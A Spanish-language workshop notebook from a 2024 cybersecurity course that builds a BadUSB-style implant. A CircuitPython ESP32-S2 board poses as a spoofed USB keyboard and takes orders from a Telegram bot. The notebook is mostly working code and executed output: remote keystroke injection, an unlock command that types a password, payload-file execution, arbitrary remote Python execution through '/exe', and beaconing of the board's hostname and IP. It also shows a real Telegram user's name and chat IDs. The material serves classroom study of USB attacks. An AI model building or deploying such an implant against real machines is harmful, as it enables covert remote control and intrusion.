### POC: "USB-Harware Command And control"
- Taller: Hacking USB From Zero To Hero CFGS Ciberseguridad - STUCOM Barcelona 2024
- https://www.stucom.com/es/

<pre>
En esta POC flasearemos y programaremos un Dispositivo Circuitpython
Para que se presente como un dispositivo USB HID personalizado**
y luego mediante un Bot de telegram controlaremos de forma centralizada
todos los PCs conectados a estos dispositivos

** modificaremos Fabricante, Producto, VID, PID y los distintos Endpoints a presentar
   Teclado , Raton , Storage , CDC/Serie , Custom
</pre>
___

<pre>
CC Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)   
https://creativecommons.org/licenses/by-sa/4.0/   
https://euskalhack.org/   
</pre>
___
<br>

In [1]:
help()

Welcome to Adafruit CircuitPython 9.0.3!

Visit circuitpython.org for more information.

To list built-in modules type `help("modules")`.


In [2]:
#Conexion con el dispositivo via serie (linux ttyXXX, Windows ComXXX, Mac cu.usbmodem 
#kernel micropython (con kernel circuitpython no hace falta pero con algunas placas no va. tema VID)
#%serialconnect --verbose --port=/dev/ttyACM2

```python
#Nota: SI da ERROR aparecera una lista con los puertos disponibles. => PRUEBA-ERROR
Connecting to --port=/dev/ttyACM1 --baud=115200 could not open port /dev/ttyACM1: 
[Errno 2] No such file or directory: '/dev/ttyACM1'

Try one of these ports as --port= 
  /dev/ttyACM0
  /dev/ttyACM2
```

In [2]:
import supervisor 
help(supervisor.runtime)
print(supervisor.ticks_ms()/1024)
print(supervisor.runtime.run_reason)

object <Runtime> is of type Runtime
  usb_connected -- <property>
  serial_connected -- <property>
  serial_bytes_available -- <property>
  run_reason -- <property>
  safe_mode_reason -- <property>
  autoreload -- <property>
  ble_workflow -- <property>
  rgb_status_brightness -- <property>
496.98
supervisor.RunReason.REPL_RELOAD


In [3]:
import microcontroller
help(microcontroller)

object <module 'microcontroller'> is of type module
  __name__ -- microcontroller
  cpu -- <Processor>
  delay_us -- <function>
  disable_interrupts -- <function>
  enable_interrupts -- <function>
  on_next_reset -- <function>
  reset -- <function>
  nvm -- <ByteArray>
  watchdog -- <WatchDogTimer>
  ResetReason -- <class 'ResetReason'>
  RunMode -- <class 'RunMode'>
  Pin -- <class 'Pin'>
  pin -- <module ''>
  Processor -- <class 'Processor'>


In [4]:
import sys
help(sys)

object <module 'sys'> is of type module
  __name__ -- sys
  argv -- []
  version -- 3.4.0; CircuitPython 9.0.3 on 2024-04-04
  version_info -- (3, 4, 0)
  implementation -- (name='circuitpython', version=(9, 0, 3), _machine='S2Mini with ESP32S2-S2FN4R2', _mpy=262)
  platform -- Espressif
  byteorder -- little
  maxsize -- 2147483647
  exit -- <function>
  stdin -- <io.FileIO 0>
  stdout -- <io.FileIO 1>
  stderr -- <io.FileIO 2>
  modules -- {}
  print_exception -- <function>


In [5]:
#Informacion de la placa , chip y version Python
import os ,sys  #help(os.uname())
print(os.uname().machine, os.uname().version, os.uname().sysname) 
print(sys.platform, sys.version, sys.implementation) 

S2Mini with ESP32S2-S2FN4R2 9.0.3 on 2024-04-04 ESP32S2-S2FN4R2
Espressif 3.4.0; CircuitPython 9.0.3 on 2024-04-04 (name='circuitpython', version=(9, 0, 3), _machine='S2Mini with ESP32S2-S2FN4R2', _mpy=262)


In [6]:
#Averiguo estado del USB:puede ser interesante en los reinicios para entrar en la BIOS
#https://github.com/todbot/circuitpython-tricks
#import supervisor #help(supervisor.runtime)
#print("USB",supervisor.runtime.usb_connected,"CDC",supervisor.runtime.serial_connected)
import supervisor;print("USB",supervisor.runtime.usb_connected)
#idea poner esto en el bucle 

USB True


In [8]:
import microcontroller
print("frec:",microcontroller.cpu.frequency , "Temp:", microcontroller.cpu.temperature)
print( microcontroller.cpu.reset_reason)
#Deberia diferenciar POWER_ON de SOFTWARE

frec: 240000000 Temp: 32.3
microcontroller.ResetReason.POWER_ON


In [9]:
help(microcontroller.RunMode)
print(microcontroller.RunMode)

object <class 'RunMode'> is of type type
  UF2 -- microcontroller.RunMode.UF2
  NORMAL -- microcontroller.RunMode.NORMAL
  SAFE_MODE -- microcontroller.RunMode.SAFE_MODE
  BOOTLOADER -- microcontroller.RunMode.BOOTLOADER
<class 'RunMode'>


In [12]:
# Conexion WIFI (si has configurado settings.toml no hace falta)
# Pero para ahorrar memoria lo hago "a mano" asi no se carga el WEBRPL
import wifi
if not  wifi.radio.connected:
    print("Conectando wifi",wifi.radio.connect(os.getenv("SSID"),os.getenv("WPWD")))
else:
    print("Wifi ok", wifi.radio.ipv4_address)


Conectando wifi None


In [13]:
# Compruebo Estado wifi
import wifi
if wifi.radio.connected:
    print("HOST:\t", wifi.radio.hostname)
    print("IP:\t", wifi.radio.ipv4_address)
    print("GW:\t", wifi.radio.ipv4_gateway,wifi.radio.ping(wifi.radio.ipv4_gateway))
    print("DNS:\t", wifi.radio.ipv4_dns)
else:
    print("sin Conexion")

HOST:	 LS2Mini
IP:	 192.168.43.240
GW:	 192.168.43.1 0.012
DNS:	 192.168.43.1


In [15]:
#Pruebas request get y json (obtengo ip publica)
import socketpool, ssl, adafruit_requests, json
if 'pool' not in locals():      #si pool      no existe lo creo
    pool = socketpool.SocketPool(wifi.radio)
if 'urequests' not in locals(): #si urequests no existe lo creo
    urequests = adafruit_requests.Session(pool, ssl.create_default_context())

resp = urequests.get("http://httpbin.org/get")  #help(resp)
print("\ndepuracion:",resp.status_code,"\n\n",resp.headers,"\n\n",resp.text)#depuracion

mi_json = json.loads((resp.text))#paso respuesta a json
print("Ip Publica:",mi_json['origin'])


depuracion: 200 

 {'server': 'gunicorn/19.9.0', 'content-type': 'application/json', 'date': 'Mon, 15 Apr 2024 21:44:27 GMT', 'connection': 'keep-alive', 'access-control-allow-credentials': 'true', 'content-length': '242', 'access-control-allow-origin': '*'} 

 {
  "args": {}, 
  "headers": {
    "Host": "httpbin.org", 
    "User-Agent": "Adafruit CircuitPython", 
    "X-Amzn-Trace-Id": "Root=1-661d9fbb-4b1a78411d4833ac2c7a2184"
  }, 
  "origin": "31.4.135.126", 
  "url": "http://httpbin.org/get"
}

Ip Publica: 31.4.135.126


In [16]:
# teclado: simula un teclado. Envia pulsaciones que se le pasan como parametro
import usb_hid
from adafruit_hid.keyboard import Keyboard 
from adafruit_hid.keycode  import Keycode   #help(Keycode)
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
#https://circuitpython.org/libraries

kbd = Keyboard(usb_hid.devices) #help(kbd)
layout = KeyboardLayoutUS(kbd) #help(layout)

def teclado(*args):
    try:
        if len(args) > 2 :   # Combinacion tres teclas a la vez
            kbd.send(args[0], args[1], args[2]);
        elif len(args) == 2 :# Combinacion dos teclas a la vez
            kbd.send(args[0], args[1])
        elif isinstance(args[0], int):
            kbd.send(args[0])# Una tecla especial. (ej ENTER)
        elif isinstance(args[0], str):
            layout.write(args[0])
    except Exception as err:
        print('Error',err)

In [17]:
#https://usb.org/sites/default/files/hut1_21.pdf Pag 117 power
#Los codigos de teclado en la pagina 82
help(Keycode)


object <class 'Keycode'> is of type type
  F23 -- 114
  F24 -- 115
  KEYPAD_FIVE -- 93
  KEYPAD_NUMLOCK -- 83
  FOUR -- 33
  SEVEN -- 36
  KEYPAD_ENTER -- 88
  BACKSLASH -- 49
  RETURN -- 40
  CAPS_LOCK -- 57
  KEYPAD_THREE -- 91
  TAB -- 43
  WINDOWS -- 227
  KEYPAD_NINE -- 97
  RIGHT_SHIFT -- 229
  KEYPAD_PERIOD -- 99
  LEFT_ARROW -- 80
  KEYPAD_ZERO -- 98
  RIGHT_GUI -- 231
  DELETE -- 76
  ESCAPE -- 41
  POUND -- 50
  OPTION -- 226
  ZERO -- 39
  GUI -- 227
  NINE -- 38
  COMMAND -- 227
  THREE -- 32
  MINUS -- 45
  END -- 77
  INSERT -- 73
  KEYPAD_SEVEN -- 95
  KEYPAD_ASTERISK -- 85
  FIVE -- 34
  KEYPAD_FORWARD_SLASH -- 84
  PAGE_DOWN -- 78
  KEYPAD_FOUR -- 92
  E -- 8
  KEYPAD_SIX -- 94
  CONTROL -- 224
  D -- 7
  G -- 10
  SHIFT -- 225
  F -- 9
  A -- 4
  M -- 16
  SPACE -- 44
  KEYPAD_PLUS -- 87
  N -- 17
  C -- 6
  B -- 5
  COMMA -- 54
  L -- 15
  TWO -- 31
  T -- 23
  W -- 26
  V -- 25
  Q -- 20
  P -- 19
  S -- 22
  PAUSE -- 72
  R -- 21
  RIGHT_BRACKET -- 48
  SEMICOLON -

```python
# Ejemplos (usa: help(Keycode) para ver las definiciones de las teclas )
#
teclado(Keycode.CONTROL, Keycode.LEFT_ALT, Keycode.DELETE) 
teclado(Keycode.CONTROL, Keycode.LEFT_ALT, Keycode.A) 
teclado(Keycode.SHIFT, Keycode.A) #Envio una combinacion de teclas
teclado(Keycode.CONTROL) 
teclado(Keycode.LEFT_ALT)
teclado(Keycode.B)                #Envio una pulsacion de teeclado
teclado("notepad")                #Escribo un texto

# Comprobacion: 
# en una terminal ejecuto usbhid-dump -e stream (deberia poder ver las pulsaciones)
```

In [18]:
# Bot Telegram recibe el ultimo mensaje de un canal (solo una vez/last_update_id)
import socketpool, ssl, adafruit_requests, json
if 'pool' not in locals():      #si pool      no existe lo creo
    pool = socketpool.SocketPool(wifi.radio)
if 'urequests' not in locals(): #si urequests no existe lo creo
    urequests = adafruit_requests.Session(pool, ssl.create_default_context())
# A diferencia de micropyton en circuitpython tengo un numero limitado de sockets/pool
if 'last_update_id' not in locals() or last_update_id is None:
    last_update_id = 0 #Inicializo la variable asi

tk =os.getenv("bot_tk")# #bot+token del bot (ver BotFather)
url="https://api.telegram.org/"+tk+"/getUpdates?offset=-1"

def telegram_bot_recibir_msg():#version solo usuario (no canales)
  global urequests,mi_json,msg,tk,update_id,last_update_id,cid
  try: #bot EuskalHack-EE29
      req = urequests.get(url) #help(req)
      mi_json = req.json()#json.loads((req.text))
      #print(mi_json)#depuracion
      req.close()
      
      if mi_json['result'] and mi_json['result'][0]['message']:
          update_id = mi_json['result'][0]['update_id']           #num id del mensaje
          msg = mi_json['result'][0]['message']['text']           #texto mensaje
          cid = str(mi_json['result'][0]['message']['chat']['id'])#chat id mensaje
          #print("\ntelegram_bot:",msg,"\n")#depuracion
          
          #solo retorno una vez cada mensaje.(asi no repito mensajes ya procesados)
          if  last_update_id != update_id:
              last_update_id = update_id
              return msg
          
      else:
          print("telegram_bot: Sin mensaje")
      
  except Exception as err:
      print('Error',err)

```python
# Depuracion / pruebas Bot Telegram
last_update_id = 0 #para volver a procesar el ultimo mensaje
msg=telegram_bot_recibir_msg()    
print(cid,msg,"\n\n",mi_json) #debug   
```

In [19]:

# Depuracion / pruebas Bot Telegram
last_update_id = 0 #para volver a procesar el ultimo mensaje
msg=telegram_bot_recibir_msg()    
print(cid,msg,"\n\n",mi_json) #debug   


249163929 Hola 

 {'result': [{'update_id': 614939454, 'message': {'message_id': 624, 'from': {'language_code': 'en', 'is_bot': False, 'last_name': 'Blazquez Lopez', 'first_name': 'Sergio', 'id': 249163929, 'username': 'Jejo_Em50L'}, 'text': 'Hola', 'chat': {'last_name': 'Blazquez Lopez', 'first_name': 'Sergio', 'username': 'Jejo_Em50L', 'id': 249163929, 'type': 'private'}, 'date': 1713132334}}], 'ok': True}


In [20]:
# Bot Telegram envia un texto via telegram apibot por GET request
# Nota: si enviamos primero un mensaje al bot este almacenara nuestro chat_id/cid
def telegram_bot_send_txt(txt):#idea pasar cid como parametro si no inicializarlo
    global urequests,mi_json,msg,tk,update_id,last_update_id,cid
    if 'cid' not in locals(): cid="-1001535567580"#-4155458875" # numero de chat/canal/usuario por defecto
    try:
        print("Envio telegram:",txt," ",end='')
        txt=txt.replace(' ','+') #reemplazo espacios por + (un urlencode "sencillo)
        url="https://api.telegram.org/"+tk+"/sendMessage?chat_id="+str(cid)+"&text="+txt
        r = urequests.get(url)
        print(r.content.decode()[1:10])  #depuracion muestro respuesta de la api
        r.close()
    except Exception as err:
        print('Error',err)

In [21]:
# Depuracion/pruebas: Envio nombre por telegram al iniciar la placa (añado mac para diferenciar placas)
if wifi.radio.connected: 
    telegram_bot_send_txt(wifi.radio.hostname+str(wifi.radio.mac_address[-1])+" "+str(wifi.radio.ipv4_address))

Envio telegram: LS2Mini94 192.168.43.240  "ok":true


In [22]:
# Proceso/ejecuto los comandos recibidos por el bot de telegram
def procesa_telegram():
    try:
        msg=telegram_bot_recibir_msg()
        print("\nprocesa_telegram:",msg,end='')#depuracion
        
        if not msg: return
        
        if msg[:4] == '/txt': #envia un texto
            print(" txt:",msg[4:]) #ej /txt notepad
            teclado(msg[4:])
        
        elif msg[:4] == '/unl': #desbloquea
            print(" unlock")
            teclado(Keycode.CONTROL, Keycode.LEFT_ALT, Keycode.A)
            teclado(msg[4:])
            teclado(Keycode.RETURN)
              
        elif msg[:4] == '/pld': #ejecuta un payload en un archivo .py
            print(" payload:",msg[4:]) #ej /pld payload1.py
            with open(msg[4:],'r') as file: 
                exec(file.read())

        elif msg[:4] == '/rst': #Resetea dispositivo a Safe(ultimo digito mac)
            if int(msg[4:]) == wifi.radio.mac_address[-1]:
                telegram_bot_send_txt("Reset"+msg[4:]);time.sleep(15)
                import microcontroller
                microcontroller.on_next_reset(microcontroller.RunMode.SAFE_MODE)
                microcontroller.reset()

        elif msg[:4] == '/key': #Combinacion tecla/s
            print(" key:",msg[4:]) #ej /pld payload1.py
            keys = msg[4:].split()
            
            if keys[0].isdigit(): # Codigo numerico que no esta en la Lista
                teclado(int(keys[0])) 
            elif len(keys) == 1 : # tecla especial (ej ENTER WINDOWS CONTROL SHIFT ALT POWER )
                teclado(getattr(Keycode,keys[0])) #help(Keycode)
            elif len(keys) == 2 : # Combinacion 2 teclas a la vez
                teclado(getattr(Keycode,keys[0]), getattr(Keycode,keys[1]))
            elif len(keys) >  2 : # Combinacion tres teclas a la vez
                teclado(getattr(Keycode,keys[0]), getattr(Keycode,keys[1]), getattr(Keycode,keys[2]))

        elif msg[:4] == '/exe': #ejecuta codigo python !!!Danger!!!
            exec(msg[5:]) #5 puto espacio
            
        else:
            msg =" Error: comando no existe: /txt /unl /pld /key /rst /exe"
            print(msg)
        
        #confirmo comando procesado: enviando un telegram con la respuesta
        telegram_bot_send_txt(wifi.radio.hostname+str(wifi.radio.mac_address[-1])+" "+msg)
        
    except Exception as err:
        print('Error',err)        

In [23]:
# Depuracion / pruebas procesa_telegram()
last_update_id = 0 #para volver a procesar el ultimo mensaje aunque ya se haya procesado
procesa_telegram()


procesa_telegram: Hola Error: comando no existe: /txt /unl /pld /key /rst /exe
Envio telegram: LS2Mini94  Error: comando no existe: /txt /unl /pld /key /rst /exe  "ok":true


In [24]:
#print(msg[5:])
#exec(str(msg[5:]))

In [25]:
#bytes_cadena = msg[4:].encode()
#print(bytes_cadena)
#print(list(bytes_cadena))  # Esto mostrará los bytes de la cadena


In [26]:
#a="print('hola')"
#exec(a)

```bash
## Comprobacion de que se ha enviado la tecla indicada
##teclado(Keycode.WINDOWS) #compruebo si sale elmismo esultado
##en una terminal ejecuto usbhid-dump -e stream (deberia poder ver las pulsaciones)
> usbhid-dump -e stream
Starting dumping interrupt transfer stream
with 1 minute timeout.

001:026:002:STREAM  01 08 00 00 00 00 00 00 00
001:026:002:STREAM  01 00 00 00 00 00 00 00 00

#esto es lo que recogeria del teclado con el comando: /key WINDOWS
#la primera linea es el codigo HID correspondiente a pulsar la tecla WINDOWS
#la segunta linea es el codigo HID correspondiente a soltar la tecla WINDOWS
```

In [27]:
# bucle infinito para que el bot telegram se procese indefinidamente (lo limito a 90seg)
import time
tiempo_inicial = time.time()

# Bucle que se ejecuta durante 90 segundos
while True and (time.time() - tiempo_inicial) < 190:
    procesa_telegram()
    time.sleep(5)
    

telegram_bot: Sin mensaje

procesa_telegram: Nonetelegram_bot: Sin mensaje

procesa_telegram: Nonetelegram_bot: Sin mensaje

procesa_telegram: Nonetelegram_bot: Sin mensaje

procesa_telegram: Nonetelegram_bot: Sin mensaje

procesa_telegram: None
procesa_telegram: /key ALT F2 key:  ALT F2
Envio telegram: LS2Mini94 /key ALT F2  "ok":true

procesa_telegram: None
procesa_telegram: /txt lxterminal txt:  lxterminal
Envio telegram: LS2Mini94 /txt lxterminal  "ok":true

procesa_telegram: None
procesa_telegram: /key ENTER key:  ENTER
Envio telegram: LS2Mini94 /key ENTER  "ok":true

procesa_telegram: /txt dmesg txt:  dmesg
Envio telegram: LS2Mini94 /txt dmesg  "ok":true

procesa_telegram: /key ENTER key:  ENTER
Envio telegram: LS2Mini94 /key ENTER  "ok":true

procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_telegram: None
procesa_te

In [ ]:
# Si no esta conectado el wifi reinicia en modo seguro Asi puedo reprogamar
import microcontroller,wifi
if not wifi.radio.connected:
    microcontroller.on_next_reset(microcontroller.RunMode.SAFE_MODE)
    microcontroller.reset()
#esto es para poder programarlo si quito el terminal serie en boot.py

In [ ]:
# reinicia la maq si es necesario 
# en este caso hace falta mas a menudo (el s2 va muy justo)
# Ya que con las pruebas se agota el numero de pools disponibles
#%serialconnect --verbose --port=/dev/ttyACM2
#import microcontroller; microcontroller.on_next_reset(microcontroller.RunMode.SAFE_MODE)
#import microcontroller; microcontroller.reset()

<br><br><br><hr>
## A1) Configuracion de __Librerias__
- https://circuitpython.org/libraries
- https://github.com/adafruit/Adafruit_CircuitPython_Bundle/releases/

1) Descargamos el paquete de librerias correspondiente e nuestra versio 8 o 9
2) Montamos la unidad DIETY
3) Copiamos en la carpeta lib: el archivo "adafruit_requests.mpy" y la carpeta "adafruit_hid"
4) Desmontamos y reiniciamos placa

In [28]:
# Comprobacion: Listado de archivos/Librerias
import os ; print(os.listdir("")) ; print(os.listdir("lib"))

['.fseventsd', '.metadata_never_index', '.Trashes', '.Trash-1000', 'sd', 'settings.toml', 'code.py', 'lib', 'boot_out.txt', 'boot.py']
['adafruit_hid', 'adafruit_requests.mpy', 'adafruit_connection_manager.mpy']


<br><br><br><hr>
## Configuracion de __settings.toml__

```toml
## contenido settings.toml (archivo de configuracion)
SSID   = "el_ssid_de_tu_wifi"
WPWD   = "el_password_de_tu_wifi"
bot_tk = "bot+ el token del bot de telegram (busca/investiga: telegram botfather)"
```

```python
## Generar settings.toml (si no se puede desde el sistema de archivos)
## OPCION1: Minimo consumo de recursos
import storage
with open('settings.toml', 'w') as file:
    file.write('SSID = "XXXX"\n')
    file.write('WPWD = "YYYY"\n')
    file.write('bot_tk = "botZZZZ:ZZZZ"\n')
```

```python
## Generar settings.toml (si no se puede desde el sistema de archivos)
## OPCION2: Modo CircuitPython Se habilitara: CircuitPython's Web API (consume mas recursos)
import storage
with open('settings.toml', 'w') as file:
    file.write('CIRCUITPY_WIFI_SSID = "XXXX"\n')
    file.write('CIRCUITPY_WIFI_PASSWORD = "YYYY"\n')
    file.write('CIRCUITPY_WEB_API_PASSWORD = ""\n') #En teoria Cadena vacia desabilita
    file.write('CIRCUITPY_WEB_API_PORT = "80"\n')
    file.write('bot_tk = "botZZZZ:ZZZZ"\n')
```

In [11]:
# Comprueba fichero
#
print(open('settings.toml', 'r').read())

SSID = "TestWiFi"
WPWD = "password"
bot_tk = "botXXXXXXXXX0"



<br><br><br><hr>
## Configuracion de __boot.py__

```toml
## Contenido boot.py (archivo de configuracion se ejecuta nada mas arrancar la maq)
## Aqui se definen los parametros USB (se ejecuta antes del usb)

import usb_cdc, usb_hid, storage, supervisor

storage.disable_usb_drive() #desabilito storaje para liberar endpoints

#Configuro parametros USB:         Fabricante    , Producto          , VID  , PID
supervisor.set_usb_identification("Sh3llC0N_2024","Understanding_USB",0x2E8A,0x0005)

#Ojo si habilitas un segundo CDC te comes todos los endpoints
#usb_cdc.enable(console=True, data=True)    # Enable console and data

#usb_hid.enable((usb_hid.Device.KEYBOARD,usb_hid.Device.MOUSE,USB_hid.Device.CONSUMER_CONTROL))
#usb_hid.enable((usb_hid.Device.KEYBOARD,usb_hid.Device.MOUSE))
usb_hid.enable((usb_hid.Device.KEYBOARD,))

print("fin boot.py")
```

```python
## Generar boot.py (si no se puede desde el sistema de archivos)
# https://learn.adafruit.com/customizing-usb-devices-in-circuitpython/usb-setup-timing
# https://docs.circuitpython.org/en/latest/shared-bindings/supervisor/index.html#supervisor.set_usb_identification
# https://github.com/obdev/v-usb/blob/master/usbdrv/USB-IDs-for-free.txt

import storage
with open('boot.py', 'w') as file:
    file.write('import usb_cdc, usb_hid, storage, supervisor\n')
    file.write('\n')
    file.write('storage.disable_usb_drive() #desabilito storaje para liberar endpoints\n')
    file.write('\n')
    file.write('#Configuro parametros USB: Fabricante , Producto , VID  , PID\n')    
    file.write('supervisor.set_usb_identification("Sh3llC0N_2024","Understanding_USB",0x16c0,0x05e1)\n')
    file.write('\n')
    file.write('#Ojo si habilitas un segundo CDC te comes todos los endpoints\n')
    file.write('#usb_cdc.enable(console=True, data=True)    # Enable console and data\n')
    file.write('\n')
    file.write('#usb_hid.enable((usb_hid.Device.KEYBOARD,usb_hid.Device.MOUSE,USB_hid.Device.CONSUMER_CONTROL))\n')
    file.write('#usb_hid.enable((usb_hid.Device.KEYBOARD,usb_hid.Device.MOUSE))\n')
    file.write('usb_hid.enable((usb_hid.Device.KEYBOARD,))\n')
    file.write('\n')
    file.write('\n')
    file.write('print("fin boot.py")\n')
```

In [29]:
# Comprueba fichero
#
print(open('boot.py', 'r').read())

import usb_cdc, usb_hid, storage, supervisor

storage.disable_usb_drive() #desabilito storaje para liberar endpoints

supervisor.set_usb_identification("Stucom_2024","Hacking_USB",0x2E8A,0x0005)

#Ojo si habilitas un segundo CDC te comes todos los endpoints
#usb_cdc.enable(console=True, data=True)    # Enable console and data

#usb_hid.enable((usb_hid.Device.KEYBOARD,usb_hid.Device.MOUSE,USB_hid.Device.CONSUMER_CONTROL))
usb_hid.enable((usb_hid.Device.KEYBOARD,usb_hid.Device.MOUSE))
#usb_hid.enable((usb_hid.Device.KEYBOARD,))

print("fin boot.py")



Los datos de la deteccion del dispositivo se verian asi:
```sh
# dmesg |tail -10
[513713.964894] usb 1-1.4.1: USB disconnect, device number 33
[513716.798624] usb 1-1.4.1: new full-speed USB device number 34 using ehci-platform
[513717.125038] usb 1-1.4.1: New USB device found, idVendor=16c0, idProduct=05e1, bcdDevice= 1.00
[513717.125113] usb 1-1.4.1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[513717.125129] usb 1-1.4.1: Product: Understanding_USB
[513717.125143] usb 1-1.4.1: Manufacturer: Sh3llC0N_2024
[513717.125157] usb 1-1.4.1: SerialNumber: 48CF6E1D726E
[513717.176012] cdc_acm 1-1.4.1:1.0: ttyACM2: USB ACM device
[513717.331292] input: Sh3llC0N_2024 Understanding_USB as /devices/platform/soc/1c1a000.usb/usb1/1-1/1-1.4/1-1.4.1/1-1.4.1:1.2/0003:16C0:05E1.0023/input/input61
[513717.395835] xinmo 0003:16C0:05E1.0023: input,hidraw0: USB HID v1.11 Keyboard [Sh3llC0N_2024 Understanding_USB] on usb-1c1a000.usb-1.4.1/input2
```

In [ ]:
#reinicia la maq si es necesario
#import microcontroller; microcontroller.reset()